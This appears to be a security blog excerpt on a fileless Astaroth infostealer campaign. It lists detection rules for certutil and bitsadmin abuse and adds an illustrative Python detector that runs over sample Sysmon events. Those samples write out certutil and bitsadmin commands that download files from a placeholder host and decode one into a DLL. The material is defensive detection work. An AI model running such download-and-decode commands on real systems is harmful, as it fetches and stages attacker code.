Unlike past campaigns, no files are saved to the attacked system during the infection process, so the infostealer is rather difficult to detect with traditional security solutions. In the February campaign distributing Astaroth malware, the attackers misused legitimate binaries of security solutions to load its modules.
Rules to detect the infection process
Suspicious Certutil Command by Florian Roth, juju4, keepwatch: https://tdm.socprime.com/tdm/info/1184/
Certutil.exe execution via Command Line or PowerShell by Eugene Nechiporenko, SOC Prime: https://tdm.socprime.com/tdm/info/1060/
Bitsadmin Download (Sysmon) by Michael Haag: https://tdm.socprime.com/tdm/info/1221/
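As an added example (my own illustrative code, not the page's and not SOC Prime's published rule logic), the Python below applies a simplified version of the three rule ideas listed above to constructed Sysmon process-creation records: certutil launched from a shell or with download/decode switches, and bitsadmin used to transfer a file. Hosts, paths and timestamps in the sample are constructed placeholders.

```python
import re

# Constructed Sysmon Event ID 1 (process creation) records flattened to one line
# each: "<time> Image=<path> CommandLine="<cmd>" ParentImage=<path>".
# Sample data only: hosts, paths and times are placeholders, not real indicators.
SAMPLE_EVENTS = r'''
2019-02-12T10:01:02Z Image=C:\Windows\System32\certutil.exe CommandLine="certutil -urlcache -split -f http://example.invalid/a.txt a.txt" ParentImage=C:\Windows\System32\cmd.exe
2019-02-12T10:01:05Z Image=C:\Windows\System32\certutil.exe CommandLine="certutil -decode a.txt a.dll" ParentImage=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2019-02-12T10:02:00Z Image=C:\Windows\System32\bitsadmin.exe CommandLine="bitsadmin /transfer job /download /priority high http://example.invalid/b.bin C:\Users\Public\b.bin" ParentImage=C:\Windows\System32\cmd.exe
2019-02-12T10:03:00Z Image=C:\Windows\System32\certutil.exe CommandLine="certutil -verify cert.cer" ParentImage=C:\Windows\explorer.exe
2019-02-12T10:04:00Z Image=C:\Program Files\Acme\acme.exe CommandLine="acme.exe --update" ParentImage=C:\Windows\explorer.exe
'''

EVENT_RE = re.compile(
    r'^(?P<ts>\S+) Image=(?P<image>.+?) CommandLine="(?P<cmd>.*)" ParentImage=(?P<parent>.+)$'
)

def basename(path):
    """Last component of a Windows path, lower-cased for comparison."""
    return path.rsplit("\\", 1)[-1].lower()

def match_rules(ev):
    """Return names of the rules an event triggers (simplified approximation of the
    listed SOC Prime rules, not their published logic)."""
    image, parent = basename(ev["image"]), basename(ev["parent"])
    cmd = ev["cmd"].lower()
    hits = []
    if image == "certutil.exe":
        # download / encode / decode switches are the tell-tale for "Suspicious Certutil Command"
        if re.search(r"-urlcache|-decode|-encode", cmd):
            hits.append("Suspicious Certutil Command")
        # certutil spawned by an interactive shell is rare in normal operations
        if parent in ("cmd.exe", "powershell.exe"):
            hits.append("Certutil.exe execution via Command Line or PowerShell")
    if image == "bitsadmin.exe" and re.search(r"/transfer|/download|/addfile", cmd):
        hits.append("Bitsadmin Download (Sysmon)")
    return hits

def scan(text):
    """Parse each record and return [(timestamp, rule name), ...] for every hit."""
    findings = []
    for line in text.strip().splitlines():
        m = EVENT_RE.match(line)
        if not m:
            continue  # malformed record: skip it rather than abort the whole scan
        for rule in match_rules(m.groupdict()):
            findings.append((m.group("ts"), rule))
    return findings
```

Running `scan(SAMPLE_EVENTS)` flags the first three records and leaves the benign certutil -verify and the unrelated updater alone.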